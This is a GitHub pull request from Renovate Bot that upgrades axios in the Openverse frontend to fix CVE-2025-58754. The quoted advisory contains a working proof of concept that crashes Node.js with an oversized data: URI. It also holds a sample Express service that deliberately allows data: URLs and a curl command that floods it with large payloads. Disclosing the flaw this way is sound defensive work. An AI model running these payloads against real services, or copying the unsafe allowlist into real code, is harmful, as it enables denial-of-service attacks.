
Conversation

@openverse-bot
Collaborator

This PR contains the following updates:

Package: axios (source)
Type: dependencies
Update: minor
Change: 1.8.2 -> 1.12.0

GitHub Vulnerability Alerts

CVE-2025-58754

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform an HTTP request. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects once totalResponseBytes exceeds [maxContentLength](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.
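To illustrate the asymmetry, here is a minimal sketch (not taken from the report; the URL and the 1 KB limit are arbitrary assumptions): the same maxContentLength rejects an oversized HTTP response but is ignored for a data: URI.

const axios = require('axios');

// HTTP: the adapter counts response bytes and rejects once they exceed maxContentLength.
axios.get('https://example.com/large-file', {   // hypothetical large resource
  maxContentLength: 1024,
  responseType: 'arraybuffer'
}).catch(err => console.error('HTTP request rejected:', err.message));

// data: URI: the same limit is ignored; the whole payload is decoded into memory
// and a synthetic 200 response is returned.
axios.get('data:application/octet-stream;base64,' + 'A'.repeat(10_000), {
  maxContentLength: 1024,
  responseType: 'arraybuffer'
}).then(res => console.log('data: URI decoded bytes:', res.data.length));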

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It accepts data: URLs, for which axios ignores maxContentLength and maxBodyLength and fully decodes the payload into memory on Node before any streaming happens, enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send three POST requests:

URL="http://127.0.0.1:8081/preview"   # default PORT and /preview route from the app above
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
  | tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null
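To make the memory growth visible, the service can be started under a capped heap before sending the requests (the filename is assumed; the app's own log line only hints at using NODE_OPTIONS):

NODE_OPTIONS=--max-old-space-size=150 node poc-link-preview.mjs

Each /preview response reports the heap growth in the x-heap-increase-mb header; with three ~35 MB payloads decoded concurrently, the capped process is expected to hit the same heap-limit crash shown above.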

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload would exceed the limit (see the sketch after this list).

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
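A minimal sketch of the first suggestion (not the actual axios patch; checkDataURISize is a hypothetical helper), estimating the decoded size from the Base64 payload length before handing the URI to fromDataURI:

// Hypothetical pre-decode guard; not part of axios.
function checkDataURISize(uri, maxContentLength) {
  if (maxContentLength == null || maxContentLength === -1) return; // treat unset or -1 as unlimited
  const comma = uri.indexOf(',');
  const header = comma === -1 ? uri : uri.slice(0, comma);
  const payload = comma === -1 ? '' : uri.slice(comma + 1);
  // Base64 decodes to at most 3/4 of its encoded length; percent-encoded text is at most its raw length.
  const estimatedBytes = /;base64$/i.test(header)
    ? Math.ceil(payload.length * 3 / 4)
    : payload.length;
  if (estimatedBytes > maxContentLength) {
    throw new Error(
      `data: URI payload (~${estimatedBytes} bytes) exceeds maxContentLength (${maxContentLength})`
    );
  }
}

// In the adapter's data: branch, the guard would run before decoding, e.g.:
//   checkDataURISize(config.url, config.maxContentLength);
//   convertedData = fromDataURI(config.url, responseType === 'blob', { Blob: config.env && config.env.Blob });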


Release Notes

axios/axios (axios)

v1.12.0

Compare Source

Bug Fixes
Features
  • adapter: surface low‑level network error details; attach original error via cause (#​6982) (78b290c)
  • fetch: add fetch, Request, Response env config variables for the adapter; (#​7003) (c959ff2)
  • support reviver on JSON.parse (#​5926) (2a97634), closes #​5924
  • types: extend AxiosResponse interface to include custom headers type (#​6782) (7960d34)
Contributors to this release

v1.11.0

Compare Source

Bug Fixes
Contributors to this release

v1.10.0

Compare Source

Bug Fixes
  • adapter: pass fetchOptions to fetch function (#​6883) (0f50af8)
  • form-data: convert boolean values to strings in FormData serialization (#​6917) (5064b10)
  • package: add module entry point for React Native; (#​6933) (3d343b8)
Features
Contributors to this release

v1.9.0

Compare Source

Bug Fixes
  • core: fix the Axios constructor implementation to treat the config argument as optional; (#​6881) (6c5d4cd)
  • fetch: fixed ERR_NETWORK mapping for Safari browsers; (#​6767) (dfe8411)
  • headers: allow iterable objects to be a data source for the set method; (#​6873) (1b1f9cc)
  • headers: fix getSetCookie by using 'get' method for caseless access; (#​6874) (d4f7df4)
  • headers: fixed support for setting multiple header values from an iterated source; (#​6885) (f7a3b5e)
  • http: send minimal end multipart boundary (#​6661) (987d2e2)
  • types: fix autocomplete for adapter config (#​6855) (e61a893)
Features
  • AxiosHeaders: add getSetCookie method to retrieve set-cookie headers values (#​5707) (80ea756)
Contributors to this release

1.8.4 (2025-03-19)

Bug Fixes
  • buildFullPath: handle allowAbsoluteUrls: false without baseURL (#​6833) (f10c2e0)
Contributors to this release

1.8.3 (2025-03-10)

Bug Fixes
  • add missing type for allowAbsoluteUrls (#​6818) (10fa70e)
  • xhr/fetch: pass allowAbsoluteUrls to buildFullPath in xhr and fetch adapters (#​6814) (ec159e5)
Contributors to this release

1.8.2 (2025-03-07)

Bug Fixes
  • http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)
Contributors to this release

1.8.1 (2025-02-26)

Bug Fixes
  • utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)
Contributors to this release

v1.8.4

Compare Source

Bug Fixes
  • buildFullPath: handle allowAbsoluteUrls: false without baseURL (#​6833) (f10c2e0)
Contributors to this release

v1.8.3

Compare Source

Bug Fixes
  • add missing type for allowAbsoluteUrls (#​6818) (10fa70e)
  • xhr/fetch: pass allowAbsoluteUrls to buildFullPath in xhr and fetch adapters (#​6814) (ec159e5)
Contributors to this release

Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled because a matching PR was automerged previously.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

@openverse-bot openverse-bot requested a review from a team as a code owner November 23, 2025 14:37
@openverse-bot openverse-bot added dependencies Pull requests that update a dependency file 💻 aspect: code Concerns the software code in the repository 🟨 tech: javascript Involves JavaScript 🟩 priority: low Low priority and doesn't need to be rushed 🧰 goal: internal improvement Improvement that benefits maintainers, not users 🧱 stack: frontend Related to the Nuxt frontend labels Nov 23, 2025
@openverse-bot openverse-bot moved this to 👀 Needs Review in Openverse PRs Nov 23, 2025
@github-actions

Latest k6 run output [1]

     ✓ status was 200

     checks.........................: 100.00% ✓ 416      ✗ 0   
     data_received..................: 98 MB   408 kB/s
     data_sent......................: 54 kB   226 B/s
     http_req_blocked...............: avg=53.98µs  min=2.58µs   med=5.12µs   max=1.31ms   p(90)=157.07µs p(95)=288.32µs
     http_req_connecting............: avg=41.53µs  min=0s       med=0s       max=1.24ms   p(90)=111.54µs p(95)=246.87µs
     http_req_duration..............: avg=161.48ms min=19.09ms  med=100.73ms max=939.73ms p(90)=372.4ms  p(95)=482.43ms
       { expected_response:true }...: avg=161.48ms min=19.09ms  med=100.73ms max=939.73ms p(90)=372.4ms  p(95)=482.43ms
   ✓ http_req_failed................: 0.00%   ✓ 0        ✗ 416 
     http_req_receiving.............: avg=176.32µs min=47.25µs  med=146.81µs max=834.26µs p(90)=281.6µs  p(95)=369.26µs
     http_req_sending...............: avg=31.46µs  min=8.38µs   med=24.01µs  max=178.89µs p(90)=51.24µs  p(95)=100.96µs
     http_req_tls_handshaking.......: avg=0s       min=0s       med=0s       max=0s       p(90)=0s       p(95)=0s      
     http_req_waiting...............: avg=161.27ms min=18.94ms  med=100.5ms  max=939.43ms p(90)=372.04ms p(95)=482.15ms
     http_reqs......................: 416     1.725311/s
     iteration_duration.............: avg=867.97ms min=419.68ms med=879.21ms max=1.82s    p(90)=1.15s    p(95)=1.22s   
     iterations.....................: 78      0.323496/s
     vus............................: 4       min=0      max=6 
     vus_max........................: 60      min=60     max=60

Footnotes

  1. This comment will automatically update with new output each time k6 runs for this PR

@dhruvkb dhruvkb merged commit d662828 into main Nov 23, 2025
81 checks passed
@dhruvkb dhruvkb deleted the gha-renovatenpm-axios-vulnerability branch November 23, 2025 20:00
@github-project-automation github-project-automation bot moved this from 👀 Needs Review to 🤝 Merged in Openverse PRs Nov 23, 2025
